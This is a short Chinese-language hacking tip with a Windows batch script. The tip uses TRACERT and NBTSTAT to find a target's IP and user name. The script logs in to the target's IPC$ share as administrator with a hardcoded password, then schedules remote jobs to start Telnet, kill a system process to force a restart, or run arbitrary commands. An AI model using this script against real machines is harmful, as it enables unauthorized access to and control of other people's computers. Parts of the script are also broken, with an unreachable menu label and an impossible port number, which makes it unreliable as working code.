知道IP先运行CMD.再输入TRACERT XX.XX.XX.XX 
其中XX.XXX.XXX.XXX为对方IP,看到第4和第5行就是别人IP上网地址, 
开再个DOS窗口.输入NBTSTAT -A XX.XXX.XXX.XXX 
就可以获得别人用户名　 
再用ＣＭＤ进入别人计算机吧。其它的ＤＯＳ　指定自己去找。
-------------------------------------------------------------------------------------给你个bat 

set /p num=密码正确!请输入要攻击的机器号(如D01): 
net use \\%num%\IPC$ "2966220" /user:administrator 
:f04 
cls 
echo 1.开启对方的Telnet服务! 
echo 2.重启对方机器! 
echo 3.输入指定命令! 
echo 4.返回上层 
echo 5.退出程序 
set /p ch=请选择: 
if %ch%==1 (goto f01) 
if %ch%==2 (goto f02) 
if %ch%==3 (goto f03) 
if %ch%==4 (goto f00) 
if %ch%==5 (exit) 
:f01 
net time \\%num% 
set /p tim=请输入时间,将上面的时间延迟两分钟: 
at \\%num% %tim% net start telnet /port:456789 /nomsg 
goto f04 
:f02 
net time \\%num% 
set /p tim=请输入时间,将上面的时间延迟两分钟: 
at \\%num% %tim% /interactive ntsd -c q -p 160 
goto f04 
:f03 
set /p ca=请输入命令: 
net time \\%num% 
set /p tim=请输入时间,将上面的时间延迟两分钟: 
at \\%num% %tim% /interactive %ca% 
goto f04 
exit 
:st5 
cls 
set /p numb=请输入对方的机器号(如D01): 
:mess 
set /p msg=请输入消息内容: 
net send %numb% %msg% 
goto mess 
exit